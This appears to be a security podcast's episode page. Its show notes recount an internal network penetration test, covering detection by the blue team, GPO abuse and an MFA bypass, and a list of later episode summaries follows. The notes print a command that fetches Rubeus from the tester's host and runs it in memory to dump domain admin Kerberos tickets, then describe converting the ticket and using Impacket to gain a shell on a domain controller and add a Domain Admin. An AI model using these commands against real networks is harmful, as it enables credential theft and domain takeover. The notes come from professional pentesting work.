7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
7 Minute Security19 Nov 2020

7MS #442: Tales of Internal Network Pentest Pwnage - Part 23

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

  • Great blue team tools alerting our customer to a lot of the stuff we were doing
  • An EDR that we tried to beat up (but it beat us up instead)
  • SharpGPOAbuse which we talked about extensively last week
  • Separation of "everyday" accounts from privileged accounts
  • Multi-factor authentication bypass!
  • Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

Avsnitt(683)

7MS #660: Baby's First Hetzner and Ludus

7MS #660: Baby's First Hetzner and Ludus

I had an absolute ball this week spinning up my first Hetzner server, though it was not without some drama (firewall config frustrations and failing hard drives).  Once I got past that, though, I got my first taste of the amazing world of Ludus.cloud, where I spun up a vulnerable Microsoft SCCM lab and have started to pwn it.  Can’t say enough good things about Ludus.cloud, but I certainly tried in this episode!

1 Feb 34min

7MS #659: Eating the Security Dog Food - Part 8

7MS #659: Eating the Security Dog Food - Part 8

Today I’m excited about some tools/automation I’ve been working on to help shore up the 7MinSec security program, including: Using Retype as a document repository Leveraging the Nessus API to automate the downloading/correlating of scan data Monitoring markdown files for “last update” changes using a basic Python script

24 Jan 28min

7MS #658: WPA3 Downgrade Attacks

7MS #658: WPA3 Downgrade Attacks

Hey friends, today we cover: The shiny new 7MinSec Club BPATTY updates A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream

17 Jan 32min

7MS #657: Writing Rad Security Documentation with Retype

7MS #657: Writing Rad Security Documentation with Retype

Hello friends!  Today we’re talking about a neat and quick-to-setup documentation service called Retype.  In a nutshell, you can get Retype installed on GitHub pages in about 5 minutes and be writing beautiful markdown pages (with built-in search) immediately.  I still absolutely love Docusaurus, but I think Retype definitely gives it a run for its money.

10 Jan 20min

7MS #656: How to Succeed in Business Without Really Crying - Part 21

7MS #656: How to Succeed in Business Without Really Crying - Part 21

Happy new year friends! Today we talk about business/personal resolutions, including: New year’s resolution on the 7MinSec biz side to have a better work/life balance New training offering in the works Considering Substack as a communications platform A mental health booster that I came across mostly by accident

3 Jan 45min

7MS #655: Happy Hacking Holidays

7MS #655: Happy Hacking Holidays

Today we’re doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai, and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy.  Links discussed today: AWUS036ACH wifi card (not my favorite anymore) Panda PAU09 N600 (love this one!) The very important Github issue that helped me better understand BPFs and WPA3 attacks TrustedSec article on WPA3 downgrade attacks

30 Dec 202458min

7MS #654: Tales of Pentest Pwnage – Part 67

7MS #654: Tales of Pentest Pwnage – Part 67

Today we’ve got some super cool stuff to cover today!  First up, BPATTY v1.4 is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that includes: Abusing SCCM Finding gold in SQL configuration/security audits

13 Dec 202441min

7MS #653: How to Succeed in Business Without Really Crying – Part 20

7MS #653: How to Succeed in Business Without Really Crying – Part 20

Hey friends, today we’re talking about tips to effectively present your technical assessment to a variety of audiences – from lovely IT and security nerds to C-levels, the board and beyond!

6 Dec 202449min

Populärt inom Politik & nyheter

p3-krim
svd-dokumentara-berattelser-2
flashback-forever
rss-krimstad
olyckan-inifran
rss-vad-fan-hande
rss-viva-fotboll
aftonbladet-daily
rss-sanning-konsekvens
svenska-fall
krimmagasinet
fordomspodden
motiv
blenda-2
dagens-eko
rss-frandfors-horna
spar
svd-nyhetsartiklar
rss-expressen-dok
spotlight